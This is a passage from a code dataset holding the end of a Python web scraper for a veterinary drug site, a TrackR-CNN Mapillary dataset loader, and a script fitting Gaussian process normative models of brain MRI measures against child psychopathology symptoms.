'sxyy', 'itemid']\n query_line=[]\n for item in data:\n '''\n for key in item:\n keys.append(key)\n print(keys)\n return\n '''\n for key in keys:\n try:\n query_line.append(item[key])\n except:\n query_line.append('')\n except:\n query_line=[]\n self.result=self.line+query_line\n global lock\n with lock:\n f=open('data/6_sycj.txt','a',encoding='utf-8')\n f.write(str(self.result)+'\\n')\n f.close()\n\ndef main():\n page=0\n while True:\n table=table_page(page)\n if table==[]:\n break\n for item in table:\n work=Query(item)\n work.setDaemon(True)\n work.start()\n time.sleep(2)\n print(page,'ok')\n page+=1\n\nmain()\n","repo_name":"19js/Nyspider","sub_path":"sysjk.ivdc.org.cn/6_sycj.py","file_name":"6_sycj.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"50"} +{"seq_id":"19502111129","text":"import tensorflow as tf\nimport pickle\nimport numpy as np\n\nfrom core.Util import calculate_ious\nfrom datasets import DataKeys\nfrom datasets.Dataset import FileListDataset\nfrom datasets.Loader import register_dataset\nfrom datasets.util.BoundingBox import get_bbox_from_segmentation_mask_np\n\nNAME = \"mapillary_crop\"\nDEFAULT_PATH = \"/globalwork/voigtlaender/data/mapillary/\"\n\n\n@register_dataset(NAME, resolution=\"quarter\")\n@register_dataset(NAME + \"_full\", resolution=\"full\")\n@register_dataset(NAME + \"_half\", resolution=\"half\")\n@register_dataset(NAME + \"_quarter\", resolution=\"quarter\")\nclass MapillaryCropDataset(FileListDataset):\n def __init__(self, config, subset, resolution):\n self.resolution = resolution\n assert resolution in (\"quarter\", \"half\", \"full\"), resolution\n if resolution == \"full\":\n default_path = DEFAULT_PATH\n else:\n default_path = DEFAULT_PATH.replace(\"/mapillary/\", \"/mapillary_{}/\".format(resolution))\n super().__init__(config, NAME, subset, default_path, 2)\n det_data_path = config.string(\"det_data_path\", \"/globalwork/voigtlaender/data/mapillary_dets/Faster-R50C4/\")\n with open(det_data_path + \"/dets_\" + subset + \".pkl\", \"rb\") as f:\n self._det_data = pickle.load(f)\n self._instance_ids = {}\n self._data_list_path = \"datasets/Mapillary/\"\n self._id_divisor = 256\n self.proposal_sampling_exponent = config.float(\"proposal_sampling_exponent\", 0.0)\n\n def read_inputfile_lists(self):\n data_list = \"training.txt\" if self.subset == \"train\" else \"validation.txt\"\n data_list = self._data_list_path + \"/\" + data_list\n imgs = []\n anns = []\n with open(data_list) as f:\n for l in f:\n im, an, *im_ids_and_sizes = l.strip().split()\n im = self.data_dir + im\n an = self.data_dir + an\n found = False\n for id_and_size in im_ids_and_sizes:\n id_ = id_and_size.split(\":\")[0]\n #size_ = int(id_and_size.split(\":\")[1])\n cat_id = int(id_) // self._id_divisor\n # class 19 person\n # TODO: 20, 21, 22 could be used as ignore classes\n if cat_id == 19 and len(self._det_data[im.split(\"/\")[-1]]) > 0:\n found = True\n k = im.split(\"/\")[-1].replace(\".jpg\", \"\")\n if k not in self._instance_ids:\n self._instance_ids[k] = set()\n self._instance_ids[k].add(int(id_))\n if found:\n imgs.append(im)\n anns.append(an)\n return imgs, anns\n\n def load_annotation(self, img, img_filename, annotation_filename):\n ann_data = tf.read_file(annotation_filename)\n ann = tf.image.decode_image(ann_data, dtype=tf.uint16, channels=1)\n ann.set_shape(img.get_shape().as_list()[:-1] + [1])\n ann = self.postproc_annotation(annotation_filename, ann)\n return ann\n\n def postproc_annotation(self, ann_filename, ann):\n class_, bbox, mask = tf.py_func(self._postproc_annotation, [ann_filename, ann], [tf.int64, tf.float32, tf.uint8])\n class_.set_shape(())\n bbox.set_shape((4,))\n mask.set_shape((None, None, 1))\n return {DataKeys.CLASSES: class_, DataKeys.BBOXES_y0x0y1x1: bbox, DataKeys.SEGMENTATION_LABELS: mask}\n\n def _postproc_annotation(self, ann_filename, ann):\n ann_filename = ann_filename.decode(\"utf-8\")\n dets = self._det_data[ann_filename.split(\"/\")[-1].replace(\".png\", \".jpg\")]\n scores = dets[:, 4]\n # sample one\n probs = scores ** self.proposal_sampling_exponent\n probs /= probs.sum()\n idx = np.random.choice(dets.shape[0], p=probs)\n det = dets[idx]\n box = det[:4]\n if self.resolution == \"half\":\n box *= 2\n elif self.resolution == \"full\":\n box *= 4\n\n gt_ids = self._instance_ids[ann_filename.split(\"/\")[-1].replace(\".png\", \"\")]\n # get gt masks\n gt_masks = [(ann == id_).astype(np.uint8) for id_ in gt_ids]\n # get gt boxes\n gt_boxes = np.array([get_bbox_from_segmentation_mask_np(mask) for mask in gt_masks], np.float32)\n # change to (x0, y0, x1, y1)\n gt_boxes = gt_boxes[:, [1, 0, 3, 2]]\n ious = calculate_ious(box[np.newaxis], gt_boxes)[0]\n iou = ious.max()\n max_idx = ious.argmax()\n if iou > 0.5:\n class_ = np.cast[np.int64](1)\n mask = gt_masks[max_idx]\n else:\n class_ = np.cast[np.int64](0)\n mask = np.full_like(ann, 255, dtype=np.uint8)\n\n # shuffle to y0x0y1x1\n box_y0x0y1x1 = box[[1, 0, 3, 2]]\n return class_, box_y0x0y1x1, mask\n","repo_name":"VisualComputingInstitute/TrackR-CNN","sub_path":"datasets/Mapillary/Mapillary_crop.py","file_name":"Mapillary_crop.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","stars":511,"dataset":"github-code","pt":"50"} +{"seq_id":"2472210716","text":"import argparse\nimport torch\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nimport matplotlib\nimport itertools\nmatplotlib.use('Agg')\nfrom pathlib import Path\nfrom lib import GenerationR, train_test_gpr, validate_gpr\nfrom sklearn.preprocessing import StandardScaler\n\n\nparser = argparse.ArgumentParser(description='sMRI-DP')\nparser.add_argument('-df', '--dataframe', type=Path)\nparser.add_argument('-tr', '--train-df', type=Path)\nparser.add_argument('-te', '--test-df', type=Path)\nparser.add_argument(\n '-ulw', '--use-last-wave', action='store_true', default=False)\nparser.add_argument('-ep', '--num-epochs', type=int, default=100)\nparser.add_argument('--random-state', '-rs', type=int, default=42)\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n results_p = Path('./results')\n results_p.mkdir(parents=True, exist_ok=True)\n ds = GenerationR(df_path=args.dataframe,\n train_df=args.train_df,\n test_df=args.test_df,\n random_state=args.random_state,\n use_last_wave=args.use_last_wave)\n min_age, max_age = ds.min_max\n differential_num_steps = 1000\n dt = 1/(differential_num_steps - 1)\n diff_range = torch.linspace(0, 1, differential_num_steps)\n brain_measures = ['volume', 'thickness']\n models = ['model2']\n brain_measures = ['volume']\n name_map = {'volume': 'vol', 'thickness': 'thickavg'}\n variables_not_to_correct = []\n means = ['ZeroMean']\n kernels = ['LinearKernel', 'MaternKernel', 'RBFKernel', 'RQKernel']\n model_params = list(itertools.product(means, kernels))\n pvalues_dict = {model: {'int_symptoms': None,\n 'ext_symptoms': None,\n 'dp_symptoms': None} for model in models}\n tvalues_dict = {model: {'int_symptoms': None,\n 'ext_symptoms': None,\n 'dp_symptoms': None} for model in models}\n pvalues_dict_abs = {\n model: {'int_symptoms': None,\n 'ext_symptoms': None,\n 'dp_symptoms': None} for model in models}\n tvalues_dict_abs = {\n model: {'int_symptoms': None,\n 'ext_symptoms': None,\n 'dp_symptoms': None} for model in models}\n kernel_dict_full = {model: None for model in models}\n pred_dict_full = {model: None for model in models}\n for model in models:\n pvalues_dict[model]['int_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n pvalues_dict[model]['ext_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n pvalues_dict[model]['dp_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n tvalues_dict[model]['int_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n tvalues_dict[model]['ext_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n tvalues_dict[model]['dp_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n pvalues_dict_abs[model]['int_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n pvalues_dict_abs[model]['ext_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n pvalues_dict_abs[model]['dp_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n tvalues_dict_abs[model]['int_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n tvalues_dict_abs[model]['ext_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n tvalues_dict_abs[model]['dp_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n kernel_dict_full[model] = {\n brain_measure: None for brain_measure in brain_measures}\n pred_dict_full[model] = {\n brain_measure: None for brain_measure in brain_measures}\n for brain_measure in brain_measures:\n brain_regions = ds.model_dict[model][brain_measure]\n region_names = [reg.replace(\n f'resid_{model}', '').replace(\n f'_{name_map[brain_measure]}_', ' ').replace(\n '_', ' ').capitalize().rstrip()\n for reg in brain_regions]\n pvalues_dict[model]['int_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n pvalues_dict[model]['ext_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n pvalues_dict[model]['dp_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n tvalues_dict[model]['int_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n tvalues_dict[model]['ext_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n tvalues_dict[model]['dp_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n pvalues_dict_abs[model]['int_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n pvalues_dict_abs[model]['ext_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n pvalues_dict_abs[model]['dp_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n tvalues_dict_abs[model]['int_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n tvalues_dict_abs[model]['ext_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n tvalues_dict_abs[model]['dp_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n kernel_dict_full[model][brain_measure] = {\n region_name: None for region_name in region_names\n }\n pred_dict_full[model][brain_measure] = {\n region_name: None for region_name in region_names\n }\n regression_dict = {region: {'z_scores': [],\n 'int_symptoms': [],\n 'ext_symptoms': [],\n 'dp_symptoms': []}\n for region in region_names}\n range_dict = {region: {'range_in': [],\n 'range_pred': []}\n for region in region_names}\n train_dict = {region_name: {} for region_name in region_names}\n diff_df = pd.DataFrame(\n np.zeros((len(brain_regions), 4)),\n index=region_names,\n columns=['min', 'max', 'avg', 'std'])\n for (region_name, brain_region) in \\\n zip(region_names, brain_regions):\n print(f'Validating region: {region_name}')\n train_dict[region_name] = {i: {'x_train': None,\n 'y_train': None}\n for i in range(len(ds.folds))}\n kernel_perf_dict = {f'{kernel}_{mean}': []\n for mean, kernel in model_params}\n #################################################\n # Performing validation\n #################################################\n for (i, (mean, kernel)) in enumerate(model_params):\n key = f'{kernel}_{mean}'\n for (k, fold) in enumerate(ds.folds):\n if not (fold['test'].empty or fold['train'].empty\n or fold['valid'].empty):\n x_train = fold['train'].loc[:, 'age_mri'].values\n x_valid = fold['valid'].loc[:, 'age_mri'].values\n\n x_train = (x_train - min_age) / (max_age - min_age)\n x_valid = (x_valid - min_age) / (max_age - min_age)\n\n y_train = np.reshape(fold['train'].loc[\n :, brain_region].values, (-1, 1))\n y_valid = np.reshape(fold['valid'].loc[\n :, brain_region].values, (-1, 1))\n\n scaler = StandardScaler(\n with_mean=True, with_std=True)\n y_train = scaler.fit_transform(y_train)\n y_valid = scaler.transform(y_valid)\n del scaler\n\n ll = validate_gpr(\n mean, kernel,\n x_train, x_valid,\n y_train, y_valid,\n num_epochs=args.num_epochs)\n kernel_perf_dict[key].append(ll)\n best_ll = -np.inf\n for (mean, kernel) in model_params:\n key = f'{kernel}_{mean}'\n if np.array(kernel_perf_dict[key]).mean() > best_ll:\n best_ll = np.array(kernel_perf_dict[key]).mean()\n best_kernel = kernel\n best_mean = mean\n best_key = key\n print(f'Brain region: {region_name}, '\n f'best kernel: {best_kernel}, '\n f'best mean: {best_mean}')\n kernel_dict_full[model][brain_measure][region_name] = best_key\n pred_df = pd.DataFrame()\n\n print(f'Predicting region: {region_name}')\n\n ####################################################\n # Test set prediction\n ####################################################\n diff_ls = []\n for (k, fold) in enumerate(ds.folds):\n if not (fold['test'].empty or fold['train'].empty\n or fold['valid'].empty):\n x_train = fold['train'].loc[:, 'age_mri'].values\n x_valid = fold['valid'].loc[:, 'age_mri'].values\n x_train = np.concatenate((x_train, x_valid))\n x_test = fold['test'].loc[:, 'age_mri'].values\n\n x_train = (x_train - min_age) / (max_age - min_age)\n x_valid = (x_valid - min_age) / (max_age - min_age)\n x_test = (x_test - min_age) / (max_age - min_age)\n\n y_train = np.reshape(fold['train'].loc[\n :, brain_region].values, (-1, 1))\n y_valid = np.reshape(fold['valid'].loc[\n :, brain_region].values, (-1, 1))\n y_train = np.concatenate(\n (y_train, y_valid))\n y_test = np.reshape(fold['test'].loc[\n :, brain_region].values, (-1, 1))\n\n scaler = StandardScaler()\n y_train = scaler.fit_transform(y_train)\n y_test = scaler.transform(y_test)\n\n train_dict[region_name][k]['x_train'] = x_train\n train_dict[region_name][k]['y_train'] = y_train\n del scaler\n\n range_in, range_pred, \\\n test_pred, trained_model, \\\n trained_likelihood = train_test_gpr(\n best_mean, best_kernel,\n x_train, x_test,\n y_train, y_test,\n num_epochs=args.num_epochs)\n\n with torch.no_grad():\n diff_y = trained_likelihood(\n trained_model(diff_range)).mean\n diff_ls.append(diff_y)\n\n range_dict[region_name]['range_in'].append(\n range_in)\n range_dict[region_name]['range_pred'].append(\n range_pred)\n\n int_symptoms = fold['test'].loc[\n :, ds.model_dict[model]['int_symptoms']].values\n ext_symptoms = fold['test'].loc[\n :, ds.model_dict[model]['ext_symptoms']].values\n dp_symptoms = fold['test'].loc[\n :, ds.model_dict[model]['dp_symptoms']].values\n z_score \\\n = (y_test.squeeze() -\n test_pred.mean.detach().numpy()) \\\n / test_pred.variance.detach().numpy()\n regression_dict[region_name]['z_scores'] \\\n += z_score.tolist()\n regression_dict[region_name]['int_symptoms'] \\\n += int_symptoms.tolist()\n regression_dict[region_name]['ext_symptoms'] \\\n += ext_symptoms.tolist()\n regression_dict[region_name]['dp_symptoms'] \\\n += dp_symptoms.tolist()\n\n temp_df = pd.DataFrame(\n np.empty((x_test.shape[0], 8)),\n columns=['x_test', 'y_test_mean', 'y_test_var',\n 'y_true', 'z_scores', 'int_symptoms',\n 'ext_symptoms', 'dp_symptoms'],\n index=fold['test'].index)\n temp_df['x_test'] = x_test\n temp_df['y_test_mean'] = test_pred.mean.numpy()\n temp_df['y_test_var'] \\\n = test_pred.variance.detach().numpy()\n temp_df['y_true'] = y_test\n temp_df['z_scores'] = z_score\n temp_df['int_symptoms'] = int_symptoms\n temp_df['ext_symptoms'] = ext_symptoms\n temp_df['dp_symptoms'] = dp_symptoms\n pred_df = pd.concat((pred_df, temp_df))\n fold_diff = torch.stack(diff_ls, dim=0).mean(0)\n dy_dt = (fold_diff[1:] - torch.roll(fold_diff, 1)[1:]) / dt\n diff_df.loc[region_name, :] = [dy_dt.min(), dy_dt.max(),\n dy_dt.mean(), dy_dt.std()]\n ############################################################################\n # Calculating p-value and rho\n ############################################################################\n pred_dict_full[model][brain_measure][region_name] = pred_df\n z_scores = np.array(regression_dict[region_name]['z_scores'])\n int_symptoms = np.array(\n regression_dict[region_name]['int_symptoms']).squeeze()\n ext_symptoms = np.array(\n regression_dict[region_name]['ext_symptoms']).squeeze()\n dp_symptoms = np.array(\n regression_dict[region_name]['dp_symptoms']).squeeze()\n\n int_mask = np.isfinite(int_symptoms) & np.isfinite(z_scores)\n ext_mask = np.isfinite(ext_symptoms) & np.isfinite(z_scores)\n dp_mask = np.isfinite(dp_symptoms) & np.isfinite(z_scores)\n\n reg_int = sm.OLS(z_scores[int_mask], int_symptoms[int_mask])\n reg_ext = sm.OLS(z_scores[ext_mask], ext_symptoms[ext_mask])\n reg_dp = sm.OLS(z_scores[dp_mask], dp_symptoms[dp_mask])\n res_int = reg_int.fit()\n res_ext = reg_ext.fit()\n res_dp = reg_dp.fit()\n\n reg_int_abs = sm.OLS(\n np.abs(z_scores[int_mask]), int_symptoms[int_mask])\n reg_ext_abs = sm.OLS(\n np.abs(z_scores[ext_mask]), ext_symptoms[ext_mask])\n reg_dp_abs = sm.OLS(\n np.abs(z_scores[dp_mask]), dp_symptoms[dp_mask])\n res_int_abs = reg_int_abs.fit()\n res_ext_abs = reg_ext_abs.fit()\n res_dp_abs = reg_dp_abs.fit()\n\n res_int_t, res_int_p = res_int.params[0], res_int.pvalues[0]\n res_ext_t, res_ext_p = res_ext.params[0], res_ext.pvalues[0]\n res_dp_t, res_dp_p = res_dp.params[0], res_dp.pvalues[0]\n\n res_int_t_abs, res_int_p_abs \\\n = res_int_abs.params[0], res_int_abs.pvalues[0]\n res_ext_t_abs, res_ext_p_abs \\\n = res_ext_abs.params[0], res_ext_abs.pvalues[0]\n res_dp_t_abs, res_dp_p_abs \\\n = res_dp_abs.params[0], res_dp_abs.pvalues[0]\n print(res_int_t, res_int_p, res_int_t_abs, res_int_p_abs)\n print(res_ext_t, res_ext_p, res_ext_t_abs, res_ext_p_abs)\n print(res_dp_t, res_dp_p, res_dp_t_abs, res_dp_p_abs)\n\n pvalues_dict[model][\n 'int_symptoms'][brain_measure][region_name] = res_int_p\n pvalues_dict[model][\n 'ext_symptoms'][brain_measure][region_name] = res_ext_p\n pvalues_dict[model][\n 'dp_symptoms'][brain_measure][region_name] = res_dp_p\n\n tvalues_dict[model][\n 'int_symptoms'][brain_measure][region_name] = res_int_t\n tvalues_dict[model][\n 'ext_symptoms'][brain_measure][region_name] = res_ext_t\n tvalues_dict[model][\n 'dp_symptoms'][brain_measure][region_name] = res_dp_t\n\n pvalues_dict_abs[model][\n 'int_symptoms'][brain_measure][region_name] = res_int_p_abs\n pvalues_dict_abs[model][\n 'ext_symptoms'][brain_measure][region_name] = res_ext_p_abs\n pvalues_dict_abs[model][\n 'dp_symptoms'][brain_measure][region_name] = res_dp_p_abs\n\n tvalues_dict_abs[model][\n 'int_symptoms'][brain_measure][region_name] = res_int_t_abs\n tvalues_dict_abs[model][\n 'ext_symptoms'][brain_measure][region_name] = res_ext_t_abs\n tvalues_dict_abs[model][\n 'dp_symptoms'][brain_measure][region_name] = res_dp_t_abs\n\n #######################################################\n # Plot dataset-wide results\n #######################################################\n plt_p = results_p / Path(f'{model}') \\\n / Path(f'{brain_measure}') / Path(f'{region_name}')\n if not plt_p.is_dir():\n plt_p.mkdir(parents=True, exist_ok=True)\n x_plot = (pred_df['x_test'].values[int_mask]\n * (max_age - min_age)) + min_age\n lower = pred_df['y_test_mean'].values[int_mask] \\\n - np.sqrt(pred_df['y_test_var'].values[int_mask])\n upper = pred_df['y_test_mean'].values[int_mask] \\\n + np.sqrt(pred_df['y_test_var'].values[int_mask])\n size_factor = 5\n\n x_sort_ix = x_plot.argsort()\n int_cmap = plt.get_cmap('spring')\n norm_c = (pred_df['int_symptoms'].values[int_mask]\n - min_age) / (max_age - min_age)\n fig, ax = plt.subplots(\n 1, 1, figsize=(30, 30), sharex=True, sharey=True)\n ax.scatter(x_plot, pred_df['y_true'].values[int_mask],\n c=norm_c,\n cmap=int_cmap,\n alpha=0.75,\n s=np.power((1 + norm_c), size_factor) * 15)\n ax.plot(x_plot[x_sort_ix],\n pred_df['y_test_mean'].values[int_mask][x_sort_ix],\n c='b', alpha=0.25)\n ax.legend(['Observed data', 'Predicted mean'])\n ax.title.set_text(f'{region_name}')\n fig.savefig(plt_p / Path('int_age_measure.png'))\n plt.close(fig)\n\n fig, ax = plt.subplots(\n 1, 1, figsize=(30, 30), sharex=True, sharey=True)\n ax.scatter(x_plot, pred_df['z_scores'].values[int_mask],\n c=norm_c,\n cmap=int_cmap,\n alpha=0.75,\n s=np.power((1 + norm_c), size_factor) * 15)\n ax.set_xlabel('Age')\n ax.set_ylabel('Z score')\n ax.title.set_text(f'{region_name}')\n fig.savefig(plt_p / Path('int_age_zscores.png'))\n plt.close(fig)\n\n x_plot = (pred_df['x_test'].values[ext_mask]\n * (max_age - min_age)) + min_age\n lower = pred_df['y_test_mean'].values[ext_mask] \\\n - np.sqrt(pred_df['y_test_var'].values[ext_mask])\n upper = pred_df['y_test_mean'].values[ext_mask] \\\n + np.sqrt(pred_df['y_test_var'].values[ext_mask])\n x_sort_ix = x_plot.argsort()\n ext_cmap = plt.get_cmap('summer')\n norm_c = (pred_df['ext_symptoms'].values[ext_mask]\n - min_age) / (max_age - min_age)\n fig, ax = plt.subplots(\n 1, 1, figsize=(30, 30), sharex=True, sharey=True)\n ax.scatter(x_plot, pred_df['y_true'].values[ext_mask],\n c=norm_c,\n cmap=ext_cmap,\n alpha=0.75,\n s=np.power((1 + norm_c), size_factor) * 15)\n ax.plot(x_plot[x_sort_ix],\n pred_df['y_test_mean'].values[ext_mask][x_sort_ix],\n c='b',\n alpha=0.25)\n ax.legend(['Observed data', 'Predicted mean'])\n ax.title.set_text(f'{region_name}')\n fig.savefig(plt_p / Path('ext_age_measure.png'))\n plt.close(fig)\n\n fig, ax = plt.subplots(\n 1, 1, figsize=(30, 30), sharex=True, sharey=True)\n ax.scatter(x_plot, pred_df['z_scores'].values[ext_mask],\n c=norm_c,\n cmap=ext_cmap,\n alpha=0.75,\n s=np.power((1 + norm_c), size_factor) * 15)\n ax.set_xlabel('Age')\n ax.set_ylabel('Z score')\n ax.title.set_text(f'{region_name}')\n fig.savefig(plt_p / Path('ext_age_zscores.png'))\n plt.close(fig)\n\n x_plot = (pred_df['x_test'].values[dp_mask]\n * (max_age - min_age)) + min_age\n lower = pred_df['y_test_mean'].values[dp_mask] \\\n - np.sqrt(pred_df['y_test_var'].values[dp_mask])\n upper = pred_df['y_test_mean'].values[dp_mask] \\\n + np.sqrt(pred_df['y_test_var'].values[dp_mask])\n x_sort_ix = x_plot.argsort()\n dp_cmap = plt.get_cmap('autumn')\n norm_c = (pred_df['dp_symptoms'].values[dp_mask]\n - min_age) / (max_age - min_age)\n fig, ax = plt.subplots(\n 1, 1, figsize=(30, 30), sharex=True, sharey=True)\n ax.scatter(x_plot, pred_df['y_true'].values[dp_mask],\n c=norm_c,\n cmap=dp_cmap,\n alpha=0.75,\n s=np.power((1 + norm_c), size_factor) * 15)\n ax.plot(x_plot[x_sort_ix],\n pred_df['y_test_mean'].values[dp_mask][x_sort_ix],\n c='b', alpha=0.25)\n ax.legend(['Observed data', 'Predicted mean'])\n ax.title.set_text(f'{region_name}')\n fig.savefig(plt_p / Path('ext_age_measure.png'))\n plt.close(fig)\n\n fig, ax = plt.subplots(\n 1, 1, figsize=(30, 30), sharex=True, sharey=True)\n ax.scatter(x_plot, pred_df['z_scores'].values[dp_mask],\n c=norm_c,\n cmap=dp_cmap,\n alpha=0.75,\n s=np.power((1 + norm_c), size_factor) * 15)\n ax.set_xlabel('Age')\n ax.set_ylabel('Z score')\n ax.title.set_text(f'{region_name}')\n fig.savefig(plt_p / Path('ext_age_zscores.png'))\n plt.close(fig)\n\n diff_p = Path('results') / Path(f'{model}') \\\n / Path(f'{brain_measure}')\n if not diff_p.is_dir():\n diff_p.mkdir(parents=True, exist_ok=True)\n diff_df.to_csv(diff_p / Path('differential.csv'))\n\n for (k, fold) in enumerate(ds.folds):\n if not (fold['test'].empty or fold['train'].empty\n or fold['valid'].empty):\n fold_p = results_p / Path(f'fold_{k}')\n if not fold_p.is_dir():\n fold_p.mkdir(parents=True, exist_ok=True)\n plt.clf()\n rows = int(np.ceil(len(region_names) / 4))\n fig_shape = (rows, 4)\n fig, axs = plt.subplots(\n *fig_shape, figsize=(30, 30), sharex=True, sharey=True)\n for (i, (region_name, brain_region)) in enumerate(\n zip(region_names, brain_regions)):\n range_in = range_dict[region_name]['range_in'][k]\n range_std = np.sqrt(range_dict[region_name][\n 'range_pred'][k].variance.detach().numpy())\n mean_pred = range_dict[region_name][\n 'range_pred'][k].mean.detach().numpy()\n lower = mean_pred - range_std\n upper = mean_pred + range_std\n\n y_train = np.reshape(fold['train'].loc[\n :, brain_region].values, (-1, 1))\n y_valid = np.reshape(fold['valid'].loc[\n :, brain_region].values, (-1, 1))\n y_train = np.concatenate((y_train, y_valid))\n y_test = np.reshape(fold['test'].loc[\n :, brain_region].values, (-1, 1))\n\n scaler = StandardScaler()\n y_train = scaler.fit_transform(y_train)\n y_test = scaler.transform(y_test).squeeze()\n x_plot = (train_dict[region_name][k][\n 'x_train']*(max_age - min_age)) + min_age\n x_test = (fold['test'].loc[\n :, 'age_mri'].values).squeeze()\n range_in = (range_in*(max_age - min_age)) + min_age\n axs[i % rows, i // rows].plot(range_in, mean_pred, 'b')\n axs[i % rows, i // rows].fill_between(\n range_in, lower, upper, alpha=0.5)\n axs[i % rows, i // rows].scatter(\n x_plot,\n train_dict[region_name][k]['y_train'].ravel(),\n color='k', alpha=0.6, s=7)\n axs[i % rows, i // rows].scatter(\n x_test, y_test,\n color='r', alpha=0.6, s=7)\n axs[i % rows, i // rows].legend(\n ['Mean', '1 SD', 'Training data', 'Test data'])\n axs[i % rows, i // rows].title.set_text(\n f'{region_name}')\n fig.savefig(fold_p / Path(f'{model} {brain_measure}.png'))\n plt.clf()\n plt.close(fig)\n\n for model in models:\n model_p = Path('private_results') / Path(f'{model}')\n if not model_p.is_dir():\n model_p.mkdir(parents=True, exist_ok=True)\n\n df_int_p = pd.DataFrame.from_dict(pvalues_dict[model]['int_symptoms'])\n df_ext_p = pd.DataFrame.from_dict(pvalues_dict[model]['ext_symptoms'])\n df_dp_p = pd.DataFrame.from_dict(pvalues_dict[model]['dp_symptoms'])\n\n df_int_t = pd.DataFrame.from_dict(tvalues_dict[model]['int_symptoms'])\n df_ext_t = pd.DataFrame.from_dict(tvalues_dict[model]['ext_symptoms'])\n df_dp_t = pd.DataFrame.from_dict(tvalues_dict[model]['dp_symptoms'])\n\n df_int_t_abs = pd.DataFrame.from_dict(\n tvalues_dict_abs[model]['int_symptoms'])\n df_ext_t_abs = pd.DataFrame.from_dict(\n tvalues_dict_abs[model]['ext_symptoms'])\n df_dp_t_abs = pd.DataFrame.from_dict(\n tvalues_dict_abs[model]['dp_symptoms'])\n\n df_int_p_abs = pd.DataFrame.from_dict(\n pvalues_dict_abs[model]['int_symptoms'])\n df_ext_p_abs = pd.DataFrame.from_dict(\n pvalues_dict_abs[model]['ext_symptoms'])\n df_dp_p_abs = pd.DataFrame.from_dict(\n pvalues_dict_abs[model]['dp_symptoms'])\n\n df_kernel = pd.DataFrame.from_dict(kernel_dict_full[model])\n for brain_measure in brain_measures:\n brain_measure_p = model_p / Path(f'{brain_measure}')\n if not brain_measure_p.is_dir():\n brain_measure_p.mkdir(parents=True, exist_ok=True)\n df_int = pd.DataFrame(\n np.empty((df_int_p[brain_measure].shape[0], 3)),\n columns=['Rejected', 'P-values', 'T-values'],\n index=df_int_p.index)\n df_ext = pd.DataFrame(\n np.empty((df_ext_p[brain_measure].shape[0], 3)),\n columns=['Rejected', 'P-values', 'T-values'],\n index=df_ext_p.index)\n df_dp = pd.DataFrame(\n np.empty((df_dp_p[brain_measure].shape[0], 3)),\n columns=['Rejected', 'P-values', 'T-values'],\n index=df_dp_p.index)\n\n df_int_abs = pd.DataFrame(\n np.empty((df_int_p_abs[brain_measure].shape[0], 3)),\n columns=['Rejected', 'P-values', 'T-values'],\n index=df_int_p.index)\n df_ext_abs = pd.DataFrame(\n np.empty((df_ext_p_abs[brain_measure].shape[0], 3)),\n columns=['Rejected', 'P-values', 'T-values'],\n index=df_ext_p.index)\n df_dp_abs = pd.DataFrame(\n np.empty((df_dp_p_abs[brain_measure].shape[0], 3)),\n columns=['Rejected', 'P-values', 'T-values'],\n index=df_dp_p.index)\n\n df_int['P-values'] = df_int_p[brain_measure]\n df_int['T-values'] = df_int_t[brain_measure]\n df_ext['P-values'] = df_ext_p[brain_measure]\n df_ext['T-values'] = df_ext_t[brain_measure]\n df_dp['P-values'] = df_dp_p[brain_measure]\n df_dp['T-values'] = df_dp_t[brain_measure]\n\n df_int_abs['P-values'] = df_int_p_abs[brain_measure]\n df_int_abs['T-values'] = df_int_t_abs[brain_measure]\n df_ext_abs['P-values'] = df_ext_p_abs[brain_measure]\n df_ext_abs['T-values'] = df_ext_t_abs[brain_measure]\n df_dp_abs['P-values'] = df_dp_p_abs[brain_measure]\n df_dp_abs['T-values'] = df_dp_t_abs[brain_measure]\n\n print(df_int)\n print(df_ext)\n print(df_dp)\n print(df_int_abs)\n print(df_ext_abs)\n print(df_dp_abs)\n\n df_int.to_csv(brain_measure_p / 'results_int.csv')\n df_ext.to_csv(brain_measure_p / 'results_ext.csv')\n df_dp.to_csv(brain_measure_p / 'results_dp.csv')\n df_int_abs.to_csv(brain_measure_p / 'results_int_abs.csv')\n df_ext_abs.to_csv(brain_measure_p / 'results_ext_abs.csv')\n df_dp_abs.to_csv(brain_measure_p / 'results_dp_abs.csv')\n df_kernel.to_csv(brain_measure_p / 'best_kernels.csv')\n\n prediction_p = brain_measure_p / Path('predictions')\n if not prediction_p.is_dir():\n prediction_p.mkdir(\n parents=True, exist_ok=True)\n for (region_name, region_df) in pred_dict_full[\n model][brain_measure].items():\n region_name_p = prediction_p / Path(f'{region_name}')\n if not region_name_p.is_dir():\n region_name_p.mkdir(parents=True, exist_ok=True)\n region_df.to_csv(region_name_p / 'predictions.csv')\n","repo_name":"eloygeenjaar/normative-smri-psychopathology","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":33181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31414399648","text":"import 